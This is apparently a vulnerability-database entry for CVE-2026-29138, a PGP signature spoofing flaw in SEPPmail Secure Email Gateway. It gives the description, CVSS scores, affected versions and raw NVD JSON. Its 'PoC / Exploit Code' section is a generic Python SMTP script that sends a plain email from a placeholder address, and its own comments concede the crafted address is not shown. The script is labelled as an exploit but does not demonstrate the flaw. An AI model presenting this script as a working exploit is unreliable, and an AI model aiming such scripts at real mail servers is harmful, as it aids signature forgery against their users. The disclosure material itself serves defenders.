Security Vulnerability Report
中文
CVE-2026-29138 CVSS 7.5 HIGH

CVE-2026-29138

Published: 2026-04-02 09:16:22
Last Modified: 2026-04-16 19:01:11

Description

SEPPmail Secure Email Gateway before version 15.0.3 allows attackers with a specially crafted email address to claim another user's PGP signature as their own.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:* - VULNERABLE
SEPPmail Secure Email Gateway < 15.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-29138: SEPPmail Secure Email Gateway PGP Signature Spoofing Description: This script demonstrates the concept of crafting an email address to claim another user's PGP signature. """ import smtplib from email.mime.text import MIMEText def send_spoofed_poc(target_server, target_port, victim_email, spoofed_sender): """ Sends a crafted email to the vulnerable SEPPmail Gateway. Args: target_server (str): The IP or hostname of the target mail server. target_port (int): The SMTP port (usually 25). victim_email (str): The email address of the victim whose signature is being claimed. spoofed_sender (str): The specially crafted email address used by the attacker. """ # Construct the message msg = MIMEText("This is a test message attempting to spoof the PGP signature.") msg['Subject'] = 'PoC Test CVE-2026-29138' msg['From'] = spoofed_sender msg['To'] = victim_email try: print(f"[*] Connecting to {target_server}:{target_port}...") # Note: In a real scenario, this connects to the vulnerable appliance with smtplib.SMTP(target_server, target_port) as server: server.starttls() # Use TLS if required # server.login(username, password) # Not needed as PR:N print(f"[*] Sending crafted mail from: {spoofed_sender}") server.sendmail(spoofed_sender, [victim_email], msg.as_string()) print("[+] Email sent successfully. Check if the signature is wrongly attributed.") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Configuration TARGET = "mail.example.com" # Replace with target SEPPmail Gateway VICTIM = "[email protected]" # The crafted address format depends on the specific exploit logic (e.g., injection or parsing trick) ATTACKER_CRAFTED_ADDR = "[email protected]" # Simplified for PoC structure send_spoofed_poc(TARGET, 25, VICTIM, ATTACKER_CRAFTED_ADDR)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29138", "sourceIdentifier": "[email protected]", "published": "2026-04-02T09:16:22.290", "lastModified": "2026-04-16T19:01:10.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SEPPmail Secure Email Gateway before version 15.0.3 allows attackers with a specially crafted email address to claim another user's PGP signature as their own."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-90"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.3", "matchCriteriaId": "E3729650-81CA-4311-94BF-14A7A191F8D1"}]}]}], "references": [{"url": "https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#seppmail-vulnerability-disclosure-1503", "source": "[email protected]", "tags": ["Release Notes"]}]}}